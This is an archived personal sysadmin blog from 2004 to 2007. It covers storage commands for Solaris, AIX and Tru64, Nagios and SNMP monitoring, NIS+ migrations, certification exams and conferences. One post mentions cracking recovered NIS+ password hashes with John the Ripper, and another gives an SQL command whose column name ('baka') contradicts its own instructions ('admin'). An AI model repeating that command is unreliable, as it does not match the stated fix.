I'm going to have to bang on this one a little more. More info later. tags: , , , ,

View or add comments (curr. 0)

The necessity of good reporting

2007-01-26 13:57:00

Finally, I've finised my fourth article for ;Login magazine. It'll appear in next month's issue, in the sysadmin section.

As is the tradition with my articles, I'll try to entice my fellow folks in IT to improve their "soft skills". In the past I've covered things like personal planning and various communications skills. This time I'll try to convey why good reporting is so important to your work and your projects.

HTML version.

PDF version. tags: , , ,

View or add comments (curr. 0)

As promised: adding a new LUN to Tru64

2006-12-22 09:00:00

As I promised a few days ago I'd also give you guys the quick description of how to add a new LUN to a Tru64 box. Instead of what I told you earlier, I thought I'd put it in a separate blog post instead. No need to edit the original one, since it's right below this one.

Adding a new LUN to a Tru64 box with TruCluster

1. Assign new LUn in the SAN fabric.

No something I usually do.

2. Let the system search for new hardware.

hwmgr scan scsi

3. Label the "disk".

disklabel -rw $DISK

4. Add the disk to a file domain (volume group).

mkfdmn $DISK $DOMAIN

5. Create a file set (logical volume).


6. Create a file system.

Not required on Tru64. Done by the mkfset command.

7. Test mount.


8. Add to fstab.

vi /etc/fstab

Also, if you want to make the new file system fail over with your clustered application, add the appropriate cfsmgr command to the stop/start script in /var/cluster/caa/bin. tags: , , , ,

View or add comments (curr. 0)

Crash course in new OSes

2006-12-20 20:20:00

The past two weeks I've been learning new stuff at a very rapid pace, because my client uses only a few Solaris boxen and has no Linux whatsoever. So now I need to give myself a crash course in both AIX and Tru64 to do stuff that I used to do in a snap.

For example, there's adding a new SAN device to a box, so it can use it for a new file system. Luckily most of the steps that you need to take are the same on each platform. It's just that you need to use different commands and terms and that you can skip certain steps. The lists below show the instructions for creating a simple volume (no mirroring, striping, RAID tricks, whatever) on all three platforms.

Adding a new LUN to a Solaris box with SDS

1. Assign new LUN in the SAN fabric.

Not something I usually do.

2. Let the system search for new hardware.

devfsadm -C disks

3. Label the "disk".

format -> confirm label request

When using Solaris Volume Manager

4. Add the disk to the volume manager.

metainit -f $META 1 1 $DISK

5. Create a logical volume.

metainit $META -p $SOFTPART $SIZE

6. Create a filesystem

newfs /dev/md/rdsk/$META

7. Test mount.

mount $MOUNT

8 Add to fstab.

vi /etc/vfstab

When using Veritas Volume Manager

4. Let Veritas find the new disk.

vxdctl enable

5. Initialize the disk for VXVM usage and add it to a disk group.

vxdiskadm -> initialize

6. Create a new volume in the diskgroup.

Use the vxassist command.

7. Create a file system.

newfs /dev/vx/rdsk/$VOLUME

8. Test mount

mount $MOUNT

9. Add to vfstab

vi /etc/vfstab

Adding a new LUN to an AIX box with LVM

1. Assign new LUN in the SAN fabric.

Not something I usually do.

2. Let the system search for new hardware.


3. Label the "disk".

Not required on AIX.

4. Add the disk to a volume group.

mkvg -y $VOLGRP -s 64 -S $DISK

5. Create a logical volume.

mklv -y $VOLNAME -t jfs2 -c1 $VOLGRP $SIZE

6. Create a filesystem

crfs -v jfs2 -d '$VOLNAME' -m '$MOUNT' -p 'rw' -a agblksize='4096' -a logname='INLINE'

7. Test mount

mount $MOUNT

8 Add to fstab.

vi /etc/filesystems

Adding a new LUN to a Tru64 box running TruCluster

I'll edit this post to add these instructions tomorrow, or on Friday. I still need to try them out on a live box ;)

Anywho. It's all pretty damn interesting and it's a blast having to almost instantly know stuff that's completely new to me. An absolute challenge! It's also given me a bunch of eye openers!

For example I've always thought it natural that, in order to make a file system switch between nodes in your cluster, you'd have to jump through a bunch of hoops to make it happen. Well, not so with TruCluster! Here, you add the LUN, go through the hoops described above and that's it! The OS automagically takes care of the rest. That took my brain a few minutes to process ^_^ tags: , , , ,

View or add comments (curr. 0)

Got my LPIC-101

2006-12-14 11:37:00

This morning I went to my local Prometric testing center for my LPI 101 exam (part one of two, for the LPIC-1). On forehand I knew I wasn't perfectly prepared, since I'd skipped trial exams and hadn't studied that hard, so I was a little anxious. Only a little though, since I usually test quite well.

Anywho: out of a maximum of 890 points I got 660, with 500 points being the minimum passing grade. Read item 2.15 this page to learn more about the weird scoring method used by the LPI. It boils down to this: out of 70 questions I got 61 correct, with a minimum of 42 to pass. If we'd use the scoring method Sun uses, I'd have gotten an 87%. Not too bad, I'd say!

I did run into two things that I was completely unprepared for. I'd like to mention them here, so you won't run into the same problem.

1. All the time, while preparing, I was told that I'd have to choose a specialization for my exam: either RPM or DPKG. Since I know more about RPM I had decided to solely focus on that subject. But lo and behold! Apparently LPI has _very_ recently changed their requisites for the LPIC-1 exams and now they cover _both_ package managers! D:

2. In total I've answered 98 questions, instead of the 70 that was advertised. LPI mentions on their website (item 2.13) that these are test-questions, considered for inclusion in future exams. These questions are not marked as such and they do not count towards your scoring. It would've been nice if there had been some kind of screen or message warning me about this _at_the_test_site_.

Anywho... I made and now I'm on to the next step: LPIC-102. tags: , , , , ,

View or add comments (curr. 0)

LPIC-101 Summary

2006-12-12 22:38:00

Version 1.0 of my LPIC-101 study notes is available. I bashed it together using the two books mentioned below. A word of caution though: this summary was made with my previous knowledge of Solaris and Linux in mind. This means that I'm skipping over a shitload of stuff that might still be interesting to others. Please only use my summary as something extra when studying for your own exam.

I'm up for my exam next Thursday, at ten in the morning. =_=;

Oh yeah... The books:

Ross Brunson - "Exam cram 2: LPIC 1", 0-7897-3127-4

Roderick W. Smith - "LPIC 1 study guide", 978-0-7821-4425-3 tags: , , , , , ,

View or add comments (curr. 0)

NLOSUG meeting

2006-10-25 23:38:00

Phew! That was a long night! I'm not used to staying up this late on weekdays =_=

I went to the first NLOSUG meeting tonight, like I said I would a few days ago. Aside from finally learning a little bit about Open Solaris (although most of it was basic community stuff) and some more in-depth stuff on ZFS, it was also very cool to meet some old acquaintances. There was a bunch of folks from Sun whom I hadn't seen in a long time, as well as Martijn and Job with whom I'd worked as colleagues a long time ago. Shiny :)

So the eve' was mostly for fun, with a little education thrown in. Well worth the hours I put in... tags: , ,

View or add comments (curr. 3)

Using BSD hardware sensors with SNMP.

2006-10-25 09:05:00

Many thanks to my colleague Guldan who pointed me towards a website giving a short description of using the BSD hardware-sensors daemon, together with Nagios in order to monitor your hardware. Using sensord should make things a lot easier for people running BSD, as they won't have to muck about with SNMP OIDs and so on. tags: , , , ,

View or add comments (curr. 0)

Open Solaris Users Group

2006-10-20 13:13:00

Sun has made arrangements for the inaugural meeting of the Dutch Open Solaris Users Group. The meeting will be held on the evening of Thursday the 26th, at their office in Amersfoort.

Aside from the stuff you'd expect (like a few lectures on new Solaris features) you could also say it'll be a fun evening :) Meet some new people, have some food'n'drinks all mixed in with some interesting work-related stuff.

I'm game :) tags: , ,

View or add comments (curr. 0)

Two days of training

2006-10-17 19:38:00

Monday and Tuesday were not spent with the usual Nagios project in Amersfoort. Instead, I spent two days cooped up in a small hotel, somewhere in the Achterhoek (for my foreign visitors: one of the Netherlands' rural, backwater areas). It was time well spent, on a inter-personal communications course from CCCM.

While originally quite sceptic, the course turned out fine. About halfway Monday things took a course that made me decide that their approach might not fit my preferences, but half an hour later I also decided that _sticking_ with the course would help me in achieving one of my goals: learning to play my cards close to my chest and not letting a group of people on to my emotions regarding a subject. So even though the course may not be 100% up my alley, I may as well take the time to get some practice in :)

Anywho... November and January will see two additional training days, with a few personal talks at the CCCM office thrown in as well. tags: , , ,

View or add comments (curr. 2)

Great minds think alike

2006-10-03 23:31:00

This goes to show that the proverb above is right: Joerg Linge, whom I met at NagKon 2006, just e-mailed me. He mentioned that right around the same time we had both come up with a similar solution to one problem.

The problem: use Nagios plugins through a normal SNMP daemon.

Our solutions were identical when it came to configuring the daemon, but differed slightly when it comes to getting the information from the client. The approach is the same, but while he uses Perl for the plugin, I use Bash ^_^

Life's little coincidences :)

Joerg's solution and write-up.

My solution and write-up.

Anywho... Joerg's a cool guy :) Go check out his website and have a look around. tags: , , ,

View or add comments (curr. 2)

Nagios Conference, aftermath

2006-09-24 09:04:00

So I made it back home in one piece. My trip back took me around 7.5 hours, which was mostly due to me driving a little bit faster :p

I have to say that the A45 route up north is much less glamorous than the A3 :( The Rast Hofe all look much older and less fancy than the ones on the A3. Ah, but they sufficed anyway...

I'm thinking of moving my summaries from the previous blog posts into one big page in the Sysadmin section. Reckon that should prevent Google from raising the Archives above the Sysadmin section when it comes to Nagios.

/me starts immediately. tags: , , , ,

View or add comments (curr. 0)

Nagios Conference, day 2

2006-09-22 23:27:00

< moved to Sysadmin section, to keep Google from messing up > tags: , ,

View or add comments (curr. 0)

Nagios Conference, intermission

2006-09-21 17:10:00

Astounding by the way, the amount of Apple laptops I see around here. Less than at SANE'06, but still, around 35%. o/ tags: , ,

View or add comments (curr. 0)

Nagios Conference, day 1

2006-09-21 17:01:00

< moved to Sysadmin section, to keep Google from messing up > tags: , ,

View or add comments (curr. 0)

Nagios Conference, intermission

2006-09-21 14:19:00

For the conference I had Snow buy me the iMic and a nice Philips microphone. For now though, I'm not completely happy with the setup.

* The mic is omnidirectional and thus doesn't pick up much of what person out in front is telling, while it does pick up quite a loot of noise from the room.

* iMic is a USB device and it seems that it claims enough CPU resources to mess with the rest of my system :(

Lunch was nice though! <3 tags: , ,

View or add comments (curr. 0)

Nagios Conference, day 0

2006-09-20 23:21:00

< moved to Sysadmin section, to keep Google from messing up > tags: , ,

View or add comments (curr. 2)

Off to Germania I go!

2006-09-19 21:13:00

The next few days I'll be in Germania... Nurnberg, to be precise.

Together with around eighty other Nagios administrators and experts I'll be attending the first, annual Nagios Conference. Over the course of two days, we'll get a chance to meet up together, exchange ideas and generally have a go at improving both Nagios and our knowledge of the software. I'm looking forward to it quite a lot.

Maybe I'll even meet up with a few of the mailing list members :) I'll bring the camera and I'll try to snap a few quick pics. tags: , , ,

View or add comments (curr. 2)

Dependency hell

2006-08-23 14:37:00

Damn! I'm really starting to hate Dependency Hell. Installing a few Nagios check scripts requires the Perl Net::SNMP module. This in turn requires three other modules. Each of these three modules requires three other modules, three of which require a C compiler on your system (which we naturally don't install on production systems). And neither can we use the port/emerge/apt-get alike Perl tools from CPAN, since (yet again) these are production systems. Augh! tags: , , , , ,

View or add comments (curr. 0)

Building RPM packages

2006-08-10 13:48:00

While working on the $CLIENT-internal package for the Nagios client (net-SNMP + NRPE + Nagios scripts + Dell/HP SNMP agent), I've been learning about compound RPM packages. I.e., packages where you combine multiple source .TGZs into one big RPM package. This requires a little magic when it comes to running the various configure and make scripts. Luckily I've found two great examples.

* SPEC file for TCL, a short SPEC file that builds a package from two source .TGZs.

* SPEC file for MythTV, a -huge- SPEC file that builds multiple packages from multiple source .TGZs, along with a very dynamic set of configure rules. tags: , , , ,

View or add comments (curr. 0)

SANE 2006 conference notes

2006-08-09 07:35:00

After months and months I've uploaded the notes that I took at the various lectures at SANE 2006. They might be usefull to -someone- out there. Who knows. Be aware though that portions of the notes are a mishmash of dutch and english :) The notes can be found as .PDFs in the menu on the left. tags: , , , , ,

View or add comments (curr. 0)

Listen up. Here's da plan...

2006-08-08 16:52:00

Because I've got all kinds of things lined up for me to do, I'm going to put them into order. That way both you and I will know what to expect. Here's my priorities:

1. Make the requisite changes to my website, so that it plays nicely with search engines. This shouldn't be more than an evening or two of work (barring any reruns of Doctor Who on BBC3).

2. Study for my two LPIC1 exams.

3. Revive the manga and anime section of the website. This needs regular updates, so I'm going to have to think of a few nice things to add to this. I'm thinking "reviews"... It's also meant to give me a couple of days off between studying for my four exams.

4. Study for my two LPIC2 exams.

5. Move other parts of the website into the mySQL database as well.

6. Improve the PHP code that gets data from the database. It could be much cleaner, safer and efficient.

7. Build some form of CMS for myself, so I don't have to work in the database manually.

So there you have it boys! The next few months of my life lined out for ya.

Parallel to da plan I will keep on expanding the Sysadmin section with new stuff I discover every week. And I will try to fit in a week or two of vacation somewhere along the line. I have a big bunch of video games that I finally want to finish! tags: , , ,

View or add comments (curr. 0)

Creating packages

2006-08-08 11:04:00

Recently I've been trying to learn how to build my own packages, both on Solaris and on Linux. I mean, using real packages to install your custom software is a much better approach than simply working with .TGZ files. In the process I've found two great tutorials/books:

* Maximum RPM, originally written as a book by one of Red Hat's employees.

* Creating Solaris packages, a short HOWTO by Mark. tags: , , , ,

View or add comments (curr. 0)

SNMP = hard work

2006-08-01 17:23:00

Boy lemme tell ya: making a nice SNMP configuration so you can actually monitor something useful takes a lot of work! :) The menu on the left has been gradually expanding with more and more details regarding the monitoring of Solaris (and Sun hardware) through SNMP. Check'em out! tags: , , , ,

View or add comments (curr. 0)

All work and no play...

2006-08-01 11:49:00

Busybusybusy, that's what I've been. I've been adding all kinds of new stuff to the Sysadmin section, telling you everything you'd like to know about monitoring Solaris and Sun hardware through SNMP.

I don't have much interesting to tell to the non-admin people right now :) Better luck at a later point in time. tags: , ,

View or add comments (curr. 0)

Nagios clients for UNIX/Linux

2006-07-27 13:01:00

I've added a small comparison between the various ways in which your Nagios server can communicate with its clients. It's in the menu on the left, or you can go there directly. tags: , , , ,

View or add comments (curr. 0)

Using SNMP with Solaris and Sun hardware

2006-07-26 16:25:00

After digging through Sun's MIB description (see SUN-PLATFORM-MIB.txt) it became clear to me that things are a lot more convoluted than I originally expected. For example, each sensor in the Sun Fire systems lead to at least five objects each describing another aspect of the sensor (name, value, expected value, unit, and so on). Unfortunately Sun has no (public) description of all possible SNMP sensor objects so I've come to the following two conclusions:

1. I'll figure it all out myself. For each model that we're using I'll weasel out every possible sensor and all information relevant to these sensors.

2. I'll have to write my own check script for Nagios which deals with with all the various permutations of sensor arrays in an appropriate fashion. Joy...


For your reference, Sun has released the following documents that pertain to their SNMP implementation. Mostly they're a slight expansion on the info from the MIB. At least they're much easier on the eyes when reading :p

* 817-2559-13

* 817-6832-10

* 817-6238-10

* 817-3000-10 tags: , , , ,

View or add comments (curr. 0)


2006-07-25 09:34:00

Right now I'm working on getting my Sun systems properly monitored through SNMP. Using the LM_sensors module for Net-SNMP has gotten me quite far, but there's one drawback. A lot of Sun's internal counters use some really odd values that don't speak for themselves. This makes it necessary to read through Sun's own MIB and correlate the data in there with the stuff from LM_sensors.

Point is, Sun isn't very forthcoming with their MIB even though it should probably be public knowlegde. Nowhere on the web can I find a copy of the file. The only way to get it is by extracting it from Sun's free SUNWmasfr package, which I have done: here's SUN-PLATFORM-MIB.txt

In now way am I claiming this file to be a product of mine and it definitely has Sun's copyright on it. I just thought I'd make the file a -little- bit more accessible through the Internet. If Sun objects, I'm sure they'll tell me :3 tags: , , , ,

View or add comments (curr. 0)

Fixes to check_log2 and check_log3

2006-06-19 15:11:00

Both check_log2 and check_log3 have been thoroughly debugged today. Finally. Thanks to both Kyle Tucker and Ali Khan for pointing out the mistakes I'd made. I also finally learned the importance of proper testing tools, so I wrote test_log2 and test_log3 which run the respective check scripts through all the possible states they can encounter.

Oh... check_ram was also -finally- modified to take the WARN and CRIT percentages through the command line. Shame on me for not doing that earlier. tags: , , , ,

View or add comments (curr. 0)

Check_log3 is born

2006-06-01 14:53:00

Today I made an improved version of the Nagios monitor "check_log2", which is now aptly called "check_log3". Version 3 of this script gives you the option to add a second query to the monitor. The previous two incarnations of the script only allowed you to search for one query and would return a Critical if it was found. Now you can also add a query which will return in a Warning message as well. Goody! tags: , , , ,

View or add comments (curr. 0)

Attending the SANE 2006 conference

2006-05-18 14:31:00

Thought I'd give you a little update from SANE'06. I'll keep it short, since there isn't a horrible lot to tell.

* Monday: Linux SysAd course was cancelled so me and Frank switched over to the IPSec course. This was 100% new material to me and (while boring at times) it was quite interesting. Now I'll at least know what people are talking about.

* Tuesday: The Solaris SMF tutorial was well worth the money, although a full day would've suited the material -much- better than half a day. In the AM I decided to crash the BSD Packet Filter tutorial and I guess the tutor should be happy I did. He had some trouble with the Powerbook used for the presentation and I was able to resolve his problems :)

* Wednesday: A full day of CF Engine, which was -totally- worth the money! Mark Burgess is an awesome speaker! Funny, smart and capable of conveying the heart of the matter I'd have loved to have this guy as a teacher in college!

* Thursday: As I suspected the conference itself is quite "meh". A few interesting speeches throughout the day, but I'm mostly taking things slowly. Instead I'm reading a bit in my new books. Unfortunately I slept -horribly- last night, so I'll be skipping the Social Event in the evening. :( tags: , , , ,

View or add comments (curr. 0)

Travelling to SANE 2006 in Delft.

2006-05-15 18:17:00

The next few days I'll be cooped up in a hotel in Delft with my colleague Frank. We'll be visiting the Sane 2006 conference, which is a combination of vacation and studying. The first three days will consist of tutorials, with the remaining two being filled with various talks and keynotes. Should anyone feel the need to hook up with me, I'll be taking the following lectures:

* Monday = Linux system administration

* Tuesday = The Solaris service management facility

* Wednesday = Host configuration and maintenance with CFEngine

* Naturally we'll also be attending the Social Event on Thursday.

Just look for the guy with the funky iBook and the Snow t-shirt. <3 tags: , , ,

View or add comments (curr. 0)

I get published! Again :)

2006-02-06 20:37:00


Today I received my copy of February's issue of ;Login: which contains the publication of my most recent article. The one about planning projects and your personal time. I love having stuff published. Once Anime Con 2006 is over and done with I'll probably write some more articles! Speaking of Anime Con, I'd better get to work before going to bed :p tags: , ,

View or add comments (curr. 0)

Hacked admin mode into Syslog-ng

2005-11-22 11:09:00

At $CLIENT I've built a centralised logging environment based on Syslog-ng, combined with MySQL. To make any useful from all the data going into the database we use PHP-syslog-ng. However, I've found a bit of a flaw with that software: any account you create has the ability to add, remove or change other accounts... Which kinda makes things insecure.

So yesterday was spent teaching myself PHP and MySQL to such a degree that I'd be able to modify the guy's source code. In the end I managed to bolt on some sort of "admin-mode" which allows you to set an "admin" flag on certain user accounts (thus giving them the capabilities mentioned above).

The updated PHP files can be found in the TAR-ball in the menu of the Sysadmin section. The only thing you'll need to do to make things work is to either:

1. Re-create your databases using the dbsetup.sql script.

2. Add the "admin" column to the "users" table using the following command. ALTER TABLE users ADD COLUMN baka BOOLEAN; tags: , , , ,

View or add comments (curr. 0)

Added Nagios plugins

2005-09-11 01:00:00

I've added all the custom Nagios monitors I wrote for $CLIENT. They might come in handy for any of you. They're not beauties, but they get the job done. tags: , , , ,

View or add comments (curr. 0)

Nagios and BoKS/Keon

2005-09-11 00:47:00

Major updates in the Sysadmin section! w00t!

In this case a lot of information one of my favourite security tools and Nagios, my new-found love on the monitoring front. tags: , , , ,

View or add comments (curr. 0)

My article on personal planning

2005-09-07 10:15:00

It has been a very long time in coming, but finally I got around to finishing version 1.0 of my tutorial/article on planning. One thing most people in IT are notoriously bad at is writing and maintaining a project planning (or their personal planning for that matter). I was originally asked by my chef at $PREV-CLIENT to write this article, but I never got around to finishing it before i left.

Aniway... It's still version 1.0, so it's still quite rough around the edges. I hope to get a whole load of reviews from friend/colleagues before submitting it to ;Login: for publication. In the mean time you guys can find it in the Sysadmin section. I hope you enjoy reading it! tags: , ,

View or add comments (curr. 0)

Sysadmin toolkit

2005-08-02 15:34:00

It's been long in coming, but after years I got 'round to putting together my Sysadmin's Toolkit. Check it out on the left, for an introduction and some photographs. tags: , , , ,

View or add comments (curr. 0)

Jumpstart, FLAR and console servers

2005-07-01 15:22:00

Currently at the office, so I'll make it a quick one :3

Unfortunately I've been making longer days than I should this week. I mean, it's not a horrendous amount of hours, but still I'd rather be at home relaxing. This week has seen the people in charge at $CLIENT up the prio on a centralised Jumpstart/FLAR server, which I was supposed to deliver. I was already working on it part time, but now they have me working on it full time. It's quite a lot of fun, since I get to work together with other departments within $CLIENT, thus making more friends and allies ^_^

I also had to struggle with Perle IOLan+ terminal servers this week, since we need to be able to use the serial management port on our Sun servers. Yes, admittedly these boxen do work for this purpose, but I'd rather have a proper console server instead of a piece of kit which was originally meant as a dial-in box for dumb terminals or modems. Let's just say that I dream of Cyclades.

Oh! Last wednesday was my birthday by the way... I've hit 26 now :3 We went out for a lovely dinner at Konichi wa in Utrecht, since we wanted to try out a different Japanese restaurant for a change. I must say: their price/quality proportions are really good! If you ever are in the neighbourhood of Utrecht and feel like Japanese, head over there! They're at Mariaplaats 9. BTW, they don't just to Tepan Yaki... They also serve excellent sushi and will make you _ramen_ or _udon_ noodles if you ask nicely!!! My new favourite restaurant :9 tags: , , ,

View or add comments (curr. 0)

Rebuilding your company's network

2005-03-14 06:51:00

Currently listening to "Ode to my family" by the Cranberries.

Wooh boy, what a weekend! I never knew that changing one simple IP address on a server could have such pronounced effects.

Due to our IP ranges at work being too limited the Networks department has been working hard to get new switches installed. They're moving all of our servers from VLANs with a netmask of to ones with a netmask of As you can imagine this broadens the range of one VLAN significantly. That all sounds good, right? Well, naturally we need to be present to change the IP settings for all of our servers. Also, not too much work. Were it not for the fact that two of the servers being moved are replica servers for BoKS and NIS+.

Now normally these transitions aren't that difficult to perform, were it not for the fact that NIS+ had decided to act like an utter bitch for the weekend! After moving the server to its new switch we needed to rebuild it as a replica in order to propagate the new IP to all of its clients through the master. Usually this takes about half an hour, including the table copies. This time around though she was determined to cooperate as little as possible! Copying one table took about an hour from entering the command to finishing the copy!

All in all it cost me the better part of seven hours to get everything in place! Grrargh. But, in my defense, that includes reconfiguring all BoKS client systems and waiting until Networks had laid out the required patches :[ tags: ,

View or add comments (curr. 0)

Migrating to a new NIS+ master

2005-02-21 08:30:00

Currently listening to "Press Conference rag" from the musical Chicago.

What a relief! we finally managed to move NIS+ to a new Master server. We put in about twelve hours on saturday, but we finally got that bitch tamed! :) Proper credit needs to be awarded, so I would like to say that our success was mostly due to the scripts which had been crafted by Jeroen and Roland. tags: , ,

View or add comments (curr. 0)

Switching NIS+ to a new master server

2005-01-16 15:38:00

Bad news for those sysadmins out there waiting for news regarding the NIS+. We tried our best yesterday, but moving NIS+ to a new Master server failed again :( This time around we used a tried and true (although much improved upon by Jeroen) procedure, which is usually reserved for worst case scenarios. Unfortunately we ran into some unforeseen problems. I'll tell you more about them when I deliver the _real_ procedure. tags: , ,

View or add comments (curr. 0)

Hacking NIS+ and BoKS

2004-11-17 18:25:00

Holy moly, what a weekend! I can tell you guys right now that the procedure I wrote for switching NIS+ master servers is NOT fool proof! We had planned to only take about four hours at a max, for switching both NIS+ and BoKS over to a new master server. Unfortunately it turned out that we would only get to spend one hour on switching NIS+ until things went horribly sour.

In the end I spent a total of eightteen hours in the office on Saturday and Sunday. I'll spare you the gory details for now (I'll incorporate them in version 2.0 of the master switch procedure).

But God, what a weekend! And the way it looks now we'll be repeating it in a week or so...

Aniwho... I'm still trying to put as much time as possible into my work for the convention, but it's going slowly. I plan on spending every free minute of coming thursday on my Foundation work though. That should get me along the way nicely. tags: , , ,

View or add comments (curr. 0)

Moving NIS+ to a new master server

2004-11-15 20:14:00

Finally got round to writing the "Switch to a new master" procedure for NIS+. This procedure is damn handy when you want to move your current NIS+ root master to new hardware. This is something that we'll be doing at my employer on the 20th of November, so I'll keep you guys posted. I'll also be sure to update the procedure should anything go wrong :] tags: , ,

View or add comments (curr. 0)

Additions to the Sysadmin section

2004-11-15 19:17:00

More expansion in the UNIX Sysadmin section! I've added procedures for initialising new NIS+ clients and for switching NIS+ over to a new master server. tags: ,

View or add comments (curr. 0)

Writing more articles

2004-11-11 21:55:00

The way things are looking right now I'll be writing a whole series of articles for the discerning system admin :) As you know I finished an article on the crafting of proposals a week or so ago. Now I'm also planning to do articles on "keeping personal and project plannings" and on "catastrophe management".

I'll also be using my lovely Powermac G5 for something completely new today! At the office we lost two passwords for NIS+ credentials and luckily we managed to retrieve what we _think_ are the encrypted passwords strings. So now I'll try and use John the Ripper to crack the passwords. I've no clue how long this'll take and I hope I can get things finished before the 20th. 'Cause that's when I need the damn passwords :) tags: , ,

View or add comments (curr. 0)

Reviewing NIS+ books

2004-11-11 19:51:00

I've added a little review page for books on the topic of NIS+, since that's something I'm currently very into at the office. tags: , , , ,

View or add comments (curr. 0)

How to write proposals

2004-11-01 09:33:00

Version 2.0 of my tutorial on writing proposals is available from the menu now. Share and enjoy! tags: , , ,

View or add comments (curr. 0)

Writing technical proposals

2004-10-23 09:05:00

Finally my work on the HOWTO for writing technical proposals is done! I've added the PDF file to the menu bar on the left. Unfortunately, for some reason PDF printing from OpenOffice doesn't always seem to work properly. The file in the menu bar prints perfectly when dragged onto my desktop printer (albeit in black and white, and not in color), but both Preview and Acrobat Reader refuse to open the file.

If any of you guys happen to have any problems opening the file, please let me know. I'll see what I can do to get things fixed. tags: , , ,

View or add comments (curr. 0)

SCNA erratum

2004-09-22 20:01:00

In the menu of the Sysadmin section you will also find a link to a small erratum which I wrote after reading Rick Bushnell's book. As you can see I found quite a number of errors. I also e-mailed this list to Prentice Hall publishers and hope that they will make proper use of the list. tags: , , , ,

View or add comments (curr. 0)

Passed my SCNA exam

2004-09-22 13:26:00

Booyeah! While I can't say that I aced the SCNA exam, I'm still extremely happy with my score: an 89% (52 out of 58 scored questions). tags: , , ,

View or add comments (curr. 0)

SCNA summary done!

2004-09-15 22:13:00

Well, it took me a couple of days, but finally it's done: my summary own the "SCNA study guide" by Rick Bushnell (see the book list). I'll be taking my first shot at the SCNA exam in about a week (the 22nd, keeping my fingers crossed), so I'm happy that I've finished the document. I thought I'd share it with the rest of you; maybe it'll be of some use.

All 29 pages are available for download as a PDF from the Sysadmin section. tags: , , , , ,

View or add comments (curr. 0)

Travelling to Brussels, teaching a course

2004-02-10 08:01:00

Ah! This feels so incredibly good! ^_^

Today I'm travelling to Brussels, instead of heading off to the office like any other day, to give a short course to our IT colleagues over there. We're busy on a very exciting (and tiring) project which involves migrating hundreds of servers from London, over to the EU mainland. These servers will be placed within domains which involve a certain piece of security software that we use at $CLIENT, and the course I'm about to give covers just that!

Anyway. Not to delve too much into our company politics :) The reason I'm feeling so well this morning (it's about 8:30 now) is because I get to take the Thalys train into Brussels! This involves getting up at five in the morning, riding a luxury cab to Schiphol airport and then getting on the train around 7:15. $CLIENT even sprang for a first class ticket for me! So that means that I get to sit in a _very_ comfy seat, while working on the company's laptop and getting pampered by two lovely ladies. Don't you just _love_ a good, free breakfast?!

Speaking of pampering: I just booked a cab ride in Brussels _from_ the train! ^_^ This is so weird! I just can't help feeling giddy with excitement. (Gee Cailin! I guess you don't get around much, do you?!)

And speaking of laptops: right now I'm working on this HP Omnibook I borrowed from the company. It's running NT4, so it's both slow and instable : ( But my experiences during the last two weeks have lead me to decide that I seriously want a laptop of my own. Preferably an iBook of course! It's unbelievable how bloody useful these contraptions are and the amount of work I can get done with them while on the road!

Aniway, I'd better get back to work now! I'll be arriving at Brussels around 9:30, so I'd better review my course material one more time *shudder*

Cheers! tags: , , ,

View or add comments (curr. 0)

Older blog posts